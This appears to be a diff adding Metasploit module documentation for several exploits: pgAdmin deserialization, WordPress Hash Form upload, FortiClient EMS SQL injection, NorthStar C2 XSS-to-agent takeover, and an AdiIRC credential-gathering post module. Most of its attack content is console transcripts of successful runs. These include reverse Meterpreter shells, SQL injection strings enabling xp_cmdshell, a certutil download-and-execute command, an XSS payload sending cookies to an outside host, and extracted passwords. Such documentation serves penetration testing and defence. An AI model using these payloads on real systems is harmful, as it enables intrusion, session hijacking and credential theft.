+1. Do: `run`
+
+### Installation (Docker on Linux)
+
+A docker instance can be started using the following command. It'll start on port 8080 with an initial account for
+`metasploit@gmail.com`. Additional accounts can be created through the web UI.
+
+```
+docker run -p 8080:80 \
+    -e 'PGADMIN_DEFAULT_EMAIL=metasploit@gmail.com' \
+    -e 'PGADMIN_DEFAULT_PASSWORD=Password1!' \
+    -d dpage/pgadmin4:8.3
+```
+
+### Installation (Windows)
+
+These steps are the bare minimum to get the application to run for testing and should not be use for a production setup.
+For a production setup, a server like Apache should be setup to run pgAdmin through it's WSGI interface.
+
+**The following paths are all relative to the default installation path `C:\Program Files\pgAdmin 4\web`**.
+
+1. [Download][1] and install the Windows build
+1. Copy the `config_distro.py` file to `config_local.py`
+1. Edit `config_local.py` and set `SERVER_MODE` to `True`
+1. Upgrade pip:  `..\python\python.exe -m pip upgrade`
+1. Install python package required by `setup.py`:  `..\python\python.exe -m pip install "psycopg[binary,pool]"`
+1. Initialize the database: `..\python\python.exe setup.py setup-db`
+1. Create an initial user account: `..\python\python.exe setup.py add-user --admin metasploit@gmail.com Password1!`
+1. Run the application: `..\python\python.exe pgAdmin4.py`
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### pgAdmin 8.3 on Docker
+
+```
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RHOSTS 192.168.250.134
+RHOSTS => 192.168.250.134
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RPORT 8080
+RPORT => 8080
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set SSL false
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => false
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set USERNAME user@gmail.com
+USERNAME => user@gmail.com
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PASSWORD Password1!
+PASSWORD => Password1!
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PAYLOAD python/meterpreter/reverse_tcp
+PAYLOAD => python/meterpreter/reverse_tcp
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set LHOST 192.168.250.134
+LHOST => 192.168.250.134
+metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > run
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
+[*] Successfully authenticated to pgAdmin
+[*] Serialized payload uploaded to: /var/lib/pgadmin/storage/zeroSteiner_gmail.com/reiciendis.pages
+[*] Triggering deserialization for path: ../storage/zeroSteiner_gmail.com/reiciendis.pages
+[*] Sending stage (24768 bytes) to 192.168.250.134
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.134:45930) at 2024-03-29 12:01:04 -0400
+
+meterpreter > getuid
+Server username: pgadmin
+meterpreter > sysinfo
+Computer     : 27b165126272
+OS           : Linux 6.7.9-200.fc39.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Mar  6 19:35:04 UTC 2024
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > pwd
+/pgadmin4
+meterpreter > 
+```
+
+[1]: https://www.postgresql.org/ftp/pgadmin/pgadmin4/v8.3/windows/
@@ -0,0 +1,196 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in WordPress Hash Form
+plugin, versions prior to 1.1.1.
+The vulnerability is due to an unauthenticated file upload flaw in the plugin.
+To replicate a vulnerable environment for testing:
+
+1. Install WordPress.
+2. Download and install the Hash Form plugin, ensuring the version is below 1.1.1.
+3. Verify that the plugin is activated and accessible on the local network.
+4. Create any form
+
+## Verification Steps
+
+1. Set up a WordPress instance with the Hash Form plugin (version < 1.1.1).
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/wp_hash_form_rce`.
+4. Set `RHOSTS` to the local IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload.
+
+## Options
+
+No option
+
+## Scenarios
+
+### Successful Exploitation Against Local WordPress with Hash Form 1.10
+
+**Setup**:
+
+- Local WordPress instance with Hash Form version 1.1.0.
+- Metasploit Framework.
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the module:
+```
+use exploit/multi/http/wp_hash_form_rce
+```
+3. Set `RHOSTS` to the local IP (e.g., 192.168.1.11).
+4. Configure other necessary options (TARGETURI, SSL, etc.).
+5. Launch the exploit:
+```
+exploit
+```
+
+**Expected Results**:
+
+With `php/meterpreter/reverse_tcp`
+
+```
+msf6 > search wp_hash_form_rce
+
+Matching Modules
+================
+
+   #  Name                                   Disclosure Date  Rank       Check  Description
+   -  ----                                   ---------------  ----       -----  -----------
+   0  exploit/multi/http/wp_hash_form_rce    2024-05-23       excellent  Yes    WordPress Hash Form Plugin RCE
+   1    \_ target: Automatic                 .                .          .      .
+   2    \_ target: PHP In-Memory             .                .          .      .
+   3    \_ target: Unix/Linux Command Shell  .                .          .      .
+   4    \_ target: Windows Command Shell     .                .          .      .
+
+
+Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_hash_form_rce
+After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'
+
+msf6 > use 0
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_hash_form_rce) > options
+
+Module options (exploit/multi/http/wp_hash_form_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to the wordpress application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP In-Memory
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/wp_hash_form_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(multi/http/wp_hash_form_rce) > set rport 8080
+rport => 8080
+msf6 exploit(multi/http/wp_hash_form_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Detected Hash Form plugin version: 1.1.0
+[+] The target appears to be vulnerable.
+[*] Attempting to retrieve nonce from the target...
+[+] Nonce retrieved: c037ee0b47
+[*] Uploading PHP payload using the retrieved nonce...
+[+] PHP payload uploaded successfully to http://localhost:8080/wp-content/uploads/hashform/temp/zumchnzt.php
+[*] Triggering the payload at http://localhost:8080/wp-content/uploads/hashform/temp/zumchnzt.php...
+[*] Sending stage (39927 bytes) to 172.20.0.3
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.20.0.3:52596) at 2024-05-28 17:52:51 +0200
+
+meterpreter > sysinfo 
+Computer    : 92b664be9b0c
+OS          : Linux 92b664be9b0c 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/wp_hash_form_rce) > options
+
+Module options (exploit/multi/http/wp_hash_form_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to the wordpress application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      KtElgOyozC       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       5555             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Unix/Linux Command Shell
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/wp_hash_form_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Detected Hash Form plugin version: 1.1.0
+[+] The target appears to be vulnerable.
+[*] Attempting to retrieve nonce from the target...
+[+] Nonce retrieved: c037ee0b47
+[*] Uploading PHP payload using the retrieved nonce...
+[+] PHP payload uploaded successfully to http://localhost:8080/wp-content/uploads/hashform/temp/roeylnhj.php
+[*] Triggering the payload at http://localhost:8080/wp-content/uploads/hashform/temp/roeylnhj.php...
+[*] Sending stage (3045380 bytes) to 172.20.0.3
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.20.0.3:53478) at 2024-05-28 18:03:35 +0200
+
+meterpreter > sysinfo
+Computer     : 172.20.0.3
+OS           : Debian 12.5 (Linux 5.15.0-91-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+- The module attempts to retrieve a nonce from the local server.
+- It then uploads and executes the payload.
+- If successful, control over the local WordPress instance is gained, depending on the payload used.
@@ -25,7 +25,7 @@ Once installed pfSense will start and you can access the web GUI by navigating t
 Sign into the application with username: `admin` password: `pfsense`

 Now at the top of the screen select System -> Advanced. Scroll down to the section named Secure Shell and tick the box
-beside `Enable Secure Shell`. Then click the `Save` button at the the bottom of the page to apply the changes.
+beside `Enable Secure Shell`. Then click the `Save` button at the bottom of the page to apply the changes.

 From your host machine we can now transfer the vulnerable package to the pfSense VM using `scp`

@@ -11,7 +11,7 @@ unexpected to an end user.

 Executable files can live in a sub-directory so when the ".contact" website link
 is clicked it traverses directories towards the executable and runs.  Making
-matters worse is if the the files are compressed then downloaded "mark of the
+matters worse is if the files are compressed then downloaded "mark of the
 web" (MOTW) may potentially not work as expected with certain archive utilitys.
 The "." chars allow directory traversal to occur in order to run the attackers
 supplied executable sitting unseen in the attackers directory.  This advisory is
@@ -0,0 +1,145 @@
+## Vulnerable Application
+An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).
+FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized
+platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which
+can be sent directly into database queries.
+
+FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013
+and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.
+In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable
+SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code
+execution in the context of NT AUTHORITY\SYSTEM
+
+Affected versions of FortiClient EMS include:
+ 7.2.0 through 7.2.2
+ 7.0.1 through 7.0.10
+
+Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.
+
+It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient
+EMS for the necessary vulnerable services to be available.
+
+### Setup
+You'll need two Windows hosts. One domain controller and one Windows 10 host (a domain controller might not be 100%
+necessary however I used one and if you choose not to, your installation mileage may vary). The Windows 10 host will eventually
+install the FortiClient EMS Client and will be managed by our FortiClient EMS Server to enable the services required
+to exploit this vulnerability on the EMS Server. On the Windows 10 host set the the following Services to the following Startup Types:
+ - Task Scheduler: Automatic
+ - Windows Installer: Manual
+ - Remote Registry: Automatic
+
+Then either disable Windows Firewall completely or configure to allow the following inbound connections:
+ - File and Printer Sharing (SMB-In)
+ - Remote Scheduled Tasks Management (RPC)
+
+Now on the domain controller download the installer `FortiClientEndpointManagementServer_7.0.7.0398_x64.exe`. You will need
+a FortiNet account to request a free trial.
+
+On the domain controller launch the installer. When it completes within the application you will be presented with a sign in page.
+Enter username: "admin" with a blank password and click "Sign in" - this will prompt you to create a new password for the admin user.
+Then authenticate with the new password.
+A pop up window reading: "We didn't find any licenses for this EMS..." click "Try Free" and sign in with your FortiNet
+account to request a free trial.
+
+Once FortiClient EMS has been launched, in the left hand side select System Settings > EMS Settings, then under Shared
+Settings select "Use FQDN" and input the domain controller's FQDN. Ensure the FQDN is accessible by pinging it from the cmdline.
+A pop up window reading: "The server will need to restart..." click "Yes".
+
+Scroll down to "EMS Settings". In the "FortiClient Download URL" replace the IP address with the domain controller's FQDN.
+Click save.
+
+Next select System Settings > FortiGuard Services under Cloud Services set the timezone your server is located in.
+Click Save.
+
+Under "Deployment & Installers" > "FortiClient Installer" on the right hand side select "Add". A pop up window will appear.
+
+For "Installer Type" select "Choose an official release". For "Release", choose 7.0 and for "Patch" choose 7.0.7 , click next.
+For "Name" input "FCT_707" click next.
+Keep all the defaults for the Features section and click next.
+Keep all the defaults for the Advanced section and click next and then click Finish.
+
+Now you should have a Deployment Package with a Download Link. Navigate to that download link on your Windows 10 host
+and download and install the .msi package. Once installed correctly you should see the Windows 10 host appear under the
+"Endpoint" tab in the EMS Server. FortiClient EMS Server should now be exploitable.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use windows/http/forticlient_ems_fctid_sqli`
+1. Set the `RHOST` and `LHOST` options
+1. Run the module
+1. Receive a Meterpreter session running in the context of `NT AUTHORITY\SYSTEM`
+
+## Scenarios
+### FortiClient EMS 7.07.0398_x64 running on Windows Server 2019 (Domain Controller)
+```
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > options
+
+Module options (exploit/windows/http/forticlient_ems_fctid_sqli):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.199.200   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   8013             yes       The target port (TCP)
+   VHOST                    no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      FqgyHVSnYd       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT               8383             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Target
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) >
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > run
+[*] Reloading module...
+
+[*] Started reverse TCP handler on 172.16.199.1:8383
+[*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
+[+] 172.16.199.200:8013 - The target is vulnerable. The SQLi has been exploited successfully
+[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;-- was executed successfully
+[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
+[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;-- was executed successfully
+[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
+[*] Sending stage (201798 bytes) to 172.16.199.200
+[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; DECLARE @SQL VARCHAR(120) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75
+726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f7a524b42764743776d624662474c46336c4e6f486d772025
+54454d50255c6a744d45695362632e6578652026207374617274202f42202554454d50255c6a744d45695362632e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully
+[*] Meterpreter session 8 opened (172.16.199.1:8383 -> 172.16.199.200:57847) at 2024-04-11 14:00:22 -0700
+
+meterpreter > getuid
+syServer username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DC2
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : KERBEROS
+Logged On Users : 16
+Meterpreter     : x64/windows
+meterpreter >
+```
@@ -0,0 +1,163 @@
+## Vulnerable Application
+
+NorthStar C2, prior to commit `7674a44` on March 11 2024, contains a vulnerability where the logs page is
+vulnerable to a stored XSS.
+An unauthenticated user can simulate an agent registration to cause the XSS and take over a user's session.
+With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts
+(agents), and kill the original agent.
+
+Successfully tested against NorthStar C2 commit `e7fdce148b6a81516e8aa5e5e037acd082611f73` running on
+Ubuntu 22.04. The agent was running on Windows 10 19045.
+
+```mermaid
+flowchart TD
+    A(fa:fa-computer Metasploit)
+    B(fa:fa-server NorthStar C2)
+    C(fa:fa-person Northstar C2 User)
+    D(fa:fa-bug Agent)
+    A -->|1. Upload XSS| B
+    B -...-> C
+    C -->|2. Visit XSS Page| B
+    C -->|3. Send cookie| A
+    A -->|4. Using Cookie, takeover agents| B
+    D -->|5. Fetch and run payload, kill agent| A
+    D -...-> B
+    B -...-> D
+```
+
+### Install NorthStar C2
+
+Instructions for Ubuntu 22.04. Official documentation and manual installation steps can be found [here](https://github.com/EnginDemirbilek/NorthStarC2/wiki/Installation).
+
+```
+sudo apt-get update
+sudo apt-get install -y software-properties-common git wget mysql-server
+sudo add-apt-repository ppa:ondrej/php
+sudo apt-get update
+sudo service mysql start
+git clone https://github.com/EnginDemirbilek/NorthStarC2.git
+cd NorthStarC2
+git checkout e7fdce148b6a81516e8aa5e5e037acd082611f73
+chmod +x install.sh
+sudo ./install.sh # mysql answers: root:<empty>, make sure to give a website username/password
+sudo apt-get purge -y php
+sudo apt autoremove -y
+sudo apt-get install -y php7.2 libapache2-mod-php7.2 php7.2-mysql
+sudo a2dismod php*
+sudo a2enmod php7.2
+sudo service apache2 restart
+```
+
+### Agent Install
+
+This should be done on a Windows computer:
+
+On the c2 payload, you'll want to edit `Program.cs` on line 13 and edit `mainUri` to your northstar IP.
+Now run the program, or compile and run it, and ensure the agent is active on the NorthStar C2 website.
+
+## Verification Steps
+
+1. Install the application, and connect an agent
+1. Start msfconsole
+1. Do: `use exploit/windows/http/northstar_c2_xss_to_agent_rce`
+1. Do: `set rhosts [ip]`
+1. Do: `set srvhost [srvhost]`
+1. Do: `set fetch_srvport [fetch_srvport]`
+1. Do: `set fetch_srvhost [fetch_srvhost]`
+1. Do: `run`
+1. Do: visit the NorthStarC2 site with a logged in user, and browse to the Server Logs page.
+1. You should get a shell on each agent.
+
+## Options
+
+### KILL
+
+If the NorthStarC2 agent should be explicitly killed on each compromised host. Defaults to `false`
+
+## Scenarios
+
+### NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 on Ubuntu 22.04 with an agent on Windows 10
+
+```
+resource (northstar.rq)> use exploit/windows/http/northstar_c2_xss_to_agent_rce
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+resource (northstar.rq)> set rhosts 4.4.4.4
+rhosts => 4.4.4.4
+resource (northstar.rq)> set srvhost 3.3.3.3
+srvhost => 3.3.3.3
+resource (northstar.rq)> set verbose true
+verbose => true
+resource (northstar.rq)> set FETCH_SRVPORT 9090
+FETCH_SRVPORT => 9090
+resource (northstar.rq)> set FETCH_srvhost 3.3.3.3
+FETCH_srvhost => 3.3.3.3
+msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > exploit
+[*] Command to run on remote host: certutil -urlcache -f http://3.3.3.3:9090/p3icRkNmQwbsIs7RYzV5sA %TEMP%\tKvCAnUBZgfn.exe & start /B %TEMP%\tKvCAnUBZgfn.exe
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) >
+[*] Fetch handler listening on 3.3.3.3:9090
+[*] HTTP server started
+[*] Adding resource /p3icRkNmQwbsIs7RYzV5sA
+[*] Started reverse TCP handler on 3.3.3.3:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. NorthStar Login page detected
+[*] Sending XSS
+[*] Sending: N*/</script><q
+[*] Sending: N*/i.src=u/*q
+[*] Sending: N*/new Image;/*q
+[*] Sending: N*/var i=/*q
+[*] Sending: N*/s+h+p+'/'+c;/*q
+[*] Sending: N*/var u=/*q
+[*] Sending: N*/'http://';/*q
+[*] Sending: N*/var s=/*q
+[*] Sending: N*/':8080';/*q
+[*] Sending: N*/var p=/*q
+[*] Sending: N*/a+b;/*q
+[*] Sending: N*/var h=/*q
+[*] Sending: N*/'.10.147';/*q
+[*] Sending: N*/var b=/*q
+[*] Sending: N*/'192.168';/*q
+[*] Sending: N*/var a=/*q
+[*] Sending: N*/d.cookie;/*q
+[*] Sending: N*/var c=/*q
+[*] Sending: N*/document;/*q
+[*] Sending: N*/var d=/*q
+[*] Sending: N</td><script>/*q
+[*] Waiting on XSS execution
+[*] Using URL: http://3.3.3.3:8080/
+[*] Server started.
+```
+
+Now visit the site with a logged in user, and browse to the Server Logs page.
+
+```
+[*] 1.1.1.1    northstar_c2_xss_to_agent_rce - Received GET request.
+[+] 1.1.1.1    northstar_c2_xss_to_agent_rce - Received cookie: st0sfhqto9mqtpd81rlg6hq5g5
+[+] 1.1.1.1    northstar_c2_xss_to_agent_rce - Live Agents
+===========
+ ID                   IP              OS                      Username                Hostname         Status
+ --                   --              --                      --------                --------         ------
+ NC1S7X834eJVcJtynrq  222.222.22.222  Windows 10 Enterprise   DESKTOP-Q0HUOEI\h00die  DESKTOP-Q0HUOEI  Online
+[+] 1.1.1.1    northstar_c2_xss_to_agent_rce - CSRF Token: 38b4d324e8cd233b7a94c62e7b3c5556
+[*] 1.1.1.1    northstar_c2_xss_to_agent_rce - (NC1S7X834eJVcJtynrq) Stealing DESKTOP-Q0HUOEI
+[*] 1.1.1.1    northstar_c2_xss_to_agent_rce -   (NC1S7X834eJVcJtynrq) Enabling shell mode
+[+] 1.1.1.1    northstar_c2_xss_to_agent_rce -     Command sent successfully to agent NC1S7X834eJVcJtynrq, response: Cmd mode enabled, all commands will be redirect to CMD. Response delay is : 2000 miliseconds
+[*] 1.1.1.1    northstar_c2_xss_to_agent_rce -   (NC1S7X834eJVcJtynrq) Running payload
+[*] Client 222.222.22.222 requested /p3icRkNmQwbsIs7RYzV5sA
+[*] Sending payload to 222.222.22.222 (Microsoft-CryptoAPI/10.0)
+[*] Client 222.222.22.222 requested /p3icRkNmQwbsIs7RYzV5sA
+[*] Sending payload to 222.222.22.222 (CertUtil URL Agent)
+[*] Sending stage (201798 bytes) to 222.222.22.222
+[*] Meterpreter session 1 opened (3.3.3.3:4444 -> 222.222.22.222:50116) at 2024-04-10 14:40:31 +0000
+msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > sessions -i 1
+[*] Starting interaction with 1...
+meterpreter > sysinfo
+Computer        : DESKTOP-Q0HUOEI
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/window
+```
@@ -29,7 +29,7 @@ the powershell script manually after some edits to accomplish access to a Window
 ## Options
  **METHOD**
  Select between DLL hijacking and service exploitation
-  * DLL mode: Using the elevated privileges from token magic the module will write a malicious file to `c:\windows\system32\windowscoredeviceinfo.dll`, a temporary host process is spawned and a DLL trigger is injected into the process to call the `usoclient`. When the `usoclient` EXE runs it loads the the malicious DLL `windowscoredeviceinfo.dll` with `SYSTEM` level privileges.
+  * DLL mode: Using the elevated privileges from token magic the module will write a malicious file to `c:\windows\system32\windowscoredeviceinfo.dll`, a temporary host process is spawned and a DLL trigger is injected into the process to call the `usoclient`. When the `usoclient` EXE runs it loads the malicious DLL `windowscoredeviceinfo.dll` with `SYSTEM` level privileges.
  * SERVICE mode: Using the elevated privileges from token magic the module, create a malicious service, and then start it with `SYSTEM` level privileges

  **SERVICE_FILENAME**
@@ -456,7 +456,7 @@ To learn more about the Python extension, please read this [wiki](https://docs.m
 There are three mains ways that you can use for moving around inside a network:

 - The route command in the msf prompt
- - The route command in the the Meterpreter prompt
+ - The route command in the Meterpreter prompt
 - The portfwd command

 ***Routing through msfconsole***
@@ -0,0 +1,167 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the Adi IRC Client.
+
+The Adi IRC Client is avaialble from (https://www.adiirc.com/).
+
+This module extracts information from the config.ini and networks.ini files in the "AppData\Local\AdiIRC" directory.
+
+This module extracts server information such as server name, server port, user name, and password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/adi_irc
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### AdiIRC Client v4.4 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/adi_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Adi irc's Config file found
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.bak
+[*] Adi irc Config.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083920_default_10.0.0.2_AdiIRCconfig.ba_051695.bak
+
+[+] serverhost=chat.freenode.net
+[+] Serverhost=irc.test.net
+[+] serverport=6667
+[+] Serverport=6667
+[+] Usernick=TheTester
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_949744.bak
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.ini
+[*] Adi irc Config.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCconfig.in_618977.ini
+
+[+] serverhost=chat.freenode.net
+[+] Serverhost=irc.test.net
+[+] serverport=6667
+[+] Serverport=6667
+[+] Usernick=TheTester
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_981500.ini
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCnetworks._976889.ini
+
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_EXTRACTIONconfig_407804.ini
+[*] Adi irc's Networks file found
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._497206.ini
+
+[*] undefined method `each' for nil:NilClass
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.bak
+[*] Adi irc Networks.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._102963.bak
+
+[*] undefined method `each' for nil:NilClass
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+```
+
+### AdiIRC Client v4.4 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+msf6 post(windows/gather/credentials/adi_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Adi irc's base folder not found in user's user directory
+
+[-] Adi irc's base folder not found in user's user directory
+
+[*] Starting Packrat...
+[*] Adi irc's base folder found
+[*] Found the folder containing specified artifact for config.
+[*] Adi irc's Config file found
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
